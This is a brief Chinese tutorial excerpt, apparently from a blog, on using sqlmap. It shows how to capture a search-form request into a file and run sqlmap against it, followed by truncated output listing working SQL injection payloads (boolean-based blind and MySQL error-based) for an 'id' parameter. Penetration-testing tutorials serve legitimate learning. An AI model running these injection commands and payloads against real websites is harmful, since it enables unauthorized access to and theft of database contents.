Category: web_security

sqlmap简单应用

在网页的搜索编辑框中输入数据并抓包,将http的request请求复制到txt文档里。然后启动sqlmap, 查看是否有注入点: python sqlmap.py -r “C:\Documents and Settings\Administrator\桌面\123.txt” — Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind – WHERE or HAVING clause Payload: id=1′ AND 6501=6501 AND ‘eWGw’=’eWGw&Submit=Submit Type: error-based Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY cl ause Payload: id=1’ AND (SELECT 1763 FROM(SELECT COUNT(*),CONCAT(0x71716a7871,(SE […]